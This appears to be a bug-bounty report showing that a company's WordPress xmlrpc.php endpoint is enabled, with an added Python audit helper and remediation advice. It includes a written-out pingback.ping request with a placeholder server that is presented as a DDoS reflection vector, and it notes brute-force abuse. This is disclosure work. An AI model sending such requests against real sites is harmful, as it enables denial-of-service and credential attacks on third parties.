Hi Team,
URL: https://www.virtru.com/xmlrpc.php
To determine whether the xmlrpc.php file is enabled, send the request below from the Repeater tab in Burp.
Request:
POST /xmlrpc.php HTTP/1.1
Host: www.virtru.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Response:
HTTP/1.1 200 OK
Content-Length: 4581
Connection: close
Vary: X-Forwarded-Proto,Accept,Accept-Encoding,User-Agent
X-Powered-By: WP Engine
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 0afe78fefe00000dd07921d000000001
Server: cloudflare
CF-RAY: 66775dde69540dd0-BOM
Notice that a successful response is received, showing that the xmlrpc.php file is enabled. Now, considering the domain https://www.virtru.com, the xmlrpc.php file discussed above could potentially be abused to cause a DDoS attack against a victim host. This is achieved by simply sending a request like the one below.
POST /xmlrpc.php HTTP/1.1
Host: www.virtru.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://<YOUR SERVER ></string></value>
</param>
<param>
<value><string>https://www.virtru.com/</string></value>
</param>
</params>
</methodCall>
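The system.listMethods check above and the pingback.ping exposure it reveals, as an added example that is not part of this report: a small Python helper that builds the same request body and classifies the response, so the remediation below can be verified afterwards. Both sample responses are constructed (the captured response was 4581 bytes and is not reproduced).

```python
"""Audit helper for the xmlrpc.php check: build the system.listMethods
request and interpret the response (added example, not from the report)."""
import xmlrpc.client

# Methods the report's references tie to abuse; exposure of any of them is flagged.
RISKY_METHODS = {
    "pingback.ping": "pingback reflection against a third-party host",
    "system.multicall": "batches many calls per request (brute-force amplification)",
}


def build_list_methods_request() -> bytes:
    """Serialise the same <methodCall> body the report sends from Burp Repeater."""
    return xmlrpc.client.dumps((), methodname="system.listMethods").encode()


def audit_list_methods_response(body: bytes) -> dict:
    """Classify a raw <methodResponse> body: disabled (fault), or enabled together
    with the risky method names found. Raises on non-XML-RPC bodies (e.g. HTML 404)."""
    try:
        params, _ = xmlrpc.client.loads(body.decode())
    except xmlrpc.client.Fault as fault:
        # WordPress answers with a <fault> once XML-RPC has been switched off.
        return {"xmlrpc_enabled": False, "fault": fault.faultString, "exposed": {}}
    methods = set(params[0])
    exposed = {m: why for m, why in RISKY_METHODS.items() if m in methods}
    return {"xmlrpc_enabled": True, "method_count": len(methods), "exposed": exposed}


# Constructed sample bodies: a short enabled response and a fault like the one a
# WordPress site returns after XML-RPC is disabled (neither is the captured traffic).
SAMPLE_ENABLED = b"""<?xml version="1.0"?>
<methodResponse><params><param><value><array><data>
<value><string>system.multicall</string></value>
<value><string>system.listMethods</string></value>
<value><string>pingback.ping</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array></value></param></params></methodResponse>"""
SAMPLE_DISABLED = xmlrpc.client.dumps(
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site."),
    methodresponse=True,
).encode()

if __name__ == "__main__":
    print(build_list_methods_request().decode())
    print(audit_list_methods_response(SAMPLE_ENABLED))
    print(audit_list_methods_response(SAMPLE_DISABLED))
```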
Remediation:
If the xmlrpc.php file is not being used, it should be disabled and removed completely to avoid any potential risks. Otherwise, it should at the very least be blocked from external access.
Reference:
1) Explanation of how an enabled xmlrpc.php file allows brute-force amplification attacks: https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html
2) Explanation of how the xmlrpc.php file enables DoS attacks: https://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html
Impact
1) This can be automated from multiple hosts and used to cause a mass DDoS attack on the victim.
2) This method is also used for brute-force attacks to steal the admin credentials and other important credentials.
POC images: virtru.com/xmlrpc.php